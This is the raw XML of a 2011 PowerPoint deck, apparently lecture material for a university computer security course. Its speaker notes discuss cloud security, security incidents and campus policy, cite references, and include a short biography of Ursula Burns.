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404" r:id="rId2"/>
    <p:sldId id="411" r:id="rId3"/>
    <p:sldId id="434" r:id="rId4"/>
    <p:sldId id="425" r:id="rId5"/>
    <p:sldId id="413" r:id="rId6"/>
    <p:sldId id="414" r:id="rId7"/>
    <p:sldId id="415" r:id="rId8"/>
    <p:sldId id="419" r:id="rId9"/>
    <p:sldId id="416" r:id="rId10"/>
    <p:sldId id="417" r:id="rId11"/>
    <p:sldId id="418" r:id="rId12"/>
    <p:sldId id="420" r:id="rId13"/>
    <p:sldId id="432" r:id="rId14"/>
    <p:sldId id="431" r:id="rId15"/>
    <p:sldId id="433" r:id="rId16"/>
    <p:sldId id="421" r:id="rId17"/>
    <p:sldId id="422" r:id="rId18"/>
    <p:sldId id="423" r:id="rId19"/>
    <p:sldId id="424" r:id="rId20"/>
    <p:sldId id="435" r:id="rId21"/>
    <p:sldId id="437" r:id="rId22"/>
    <p:sldId id="394" r:id="rId23"/>
    <p:sldId id="427" r:id="rId24"/>
    <p:sldId id="426" r:id="rId25"/>
    <p:sldId id="428" r:id="rId26"/>
    <p:sldId id="430" r:id="rId27"/>
    <p:sldId id="436" r:id="rId28"/>
    <p:sldId id="429" r:id="rId29"/>
    <p:sldId id="438" r:id="rId30"/>
    <p:sldId id="439" r:id="rId31"/>
    <p:sldId id="440" r:id="rId32"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7010400" cy="9236075"/>
  <p:custDataLst>
    <p:tags r:id="rId35"/>
  </p:custDataLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="85000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="20000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>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1pPr>
    <a:lvl2pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="85000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="20000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>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2pPr>
    <a:lvl3pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="85000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="20000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>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3pPr>
    <a:lvl4pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="85000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="20000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>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4pPr>
    <a:lvl5pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="85000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="20000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>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4AC"/>
    <a:srgbClr val="08F81F"/>
    <a:srgbClr val="FF99CC"/>
    <a:srgbClr val="3333FF"/>
    <a:srgbClr val="00CC00"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="00FF00"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="FFCCCC"/>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77" autoAdjust="0"/>
    <p:restoredTop sz="84615" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-732" y="-480"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="144"/>
        <p:guide orient="horz" pos="4176"/>
        <p:guide orient="horz" pos="893"/>
        <p:guide orient="horz" pos="1200"/>
        <p:guide orient="horz" pos="1492"/>
        <p:guide orient="horz" pos="2764"/>
        <p:guide pos="240"/>
        <p:guide pos="5627"/>
        <p:guide pos="4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p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-1114" y="75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 y="0"/>
            <a:ext cx="3038475" cy="4621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eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200" b="1">
                <a:effectLst/>
                <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3971926" y="0"/>
            <a:ext cx="3038475" cy="4621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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1000">
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7C4A02B3-7D28-4283-AD1B-2157CF231E57}" type="datetime8">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="8773958"/>
            <a:ext cx="6323013" cy="462119"/>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eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="800">
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6384926" y="8773958"/>
            <a:ext cx="625475" cy="462119"/>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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200" b="1">
                <a:effectLst/>
                <a:latin typeface="Segoe Semibold" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{DD457B1D-73F8-4A6E-8DBB-BAB367E17BEA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24212031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1" y="0"/>
            <a:ext cx="3038475" cy="4621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eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3970339" y="0"/>
            <a:ext cx="3038475" cy="4621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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292"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701675" y="4387768"/>
            <a:ext cx="5607050" cy="4155919"/>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879628"/>
            <a:ext cx="5792788" cy="35487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eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="800">
                <a:effectLst/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29703" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5707063" y="8772378"/>
            <a:ext cx="1301750" cy="4621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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17327017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igital.com/justiceleague/2011/06/15/cloud-security-panel-at-nist-and-informit-reaction/"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ww.informit.com/articles/article.aspx?p=1727761"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n.wikipedia.org/wiki/Baruch_Houses" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Ursula_Burns#cite_note-bep-3"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en.wikipedia.org/wiki/Columbia_University" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Polytechnic_Institute_of_NYU" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Ursula_Burns#cite_note-kws-2"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gazette.com/articles/xiotech-114770-company-computer.html#ixzz1Ir8z4sKe"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www.gazette.com/articles/xiotech-114770-company-computer.html#ixzz1Ir8ZBzBS"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Siemens"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en.wikipedia.org/wiki/SCADA" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Microsoft_Windows" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Industrial_engineerin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projects.webappsec.org/w/page/13246989/Web%20Application%20Security%20Statistic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cs.uccs.edu/~cs691/studentproj/projM2011/eashary/doc/"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Smashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the Stack for Fun and Profit. Aleph One/Elias Levy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> examples and insights for cyber security incidents.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Think how you handle them and what are related security policies in place or needed.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Discuss some recent projects and their potential impact on campus security procedures/policies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1184621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Compared with progressive data center 170,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sqrt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (IBM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>zio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>emc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>storagetec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> drive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>HP data center: Direct TV and Microsoft/HP joint effort.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1632235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you know cloud computing infrastructure are not compromised?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cigital.com/justiceleague/2011/06/15/cloud-security-panel-at-nist-and-informit-reaction/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Partly Cloudy with a Chance of Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Gary McGraw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cigital</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1"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Steve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Lipner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> of Microsoft, JC Moses of Amazon, Jonathan Smith of Penn, and Jeremy Epstein of SRI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Gary said the price competition will drive the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> feature to be minimum backbone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> without security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>My class disagree. What do you think?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{20A3EF14-F589-435C-83BC-40BAE6CE08AB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/19/2011 2:36 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E9516E1B-70A2-475D-87CB-BD13E0E584E7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1487279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0001BBB5-8EBA-468D-A480-0260566868DF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr 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0001BBB5-8EBA-468D-A480-0260566868DF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr 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Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Burns was raised by a single mother in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Baruch Houses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, a New York city housing project.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>[3]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Her mother is of Irish and German descent, her father is African American. She attended Cathedral High School, a Catholic, all-girls school on East 56th Street in New York. She then went on to obtain a bachelor of science degree in Mechanical Engineering from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
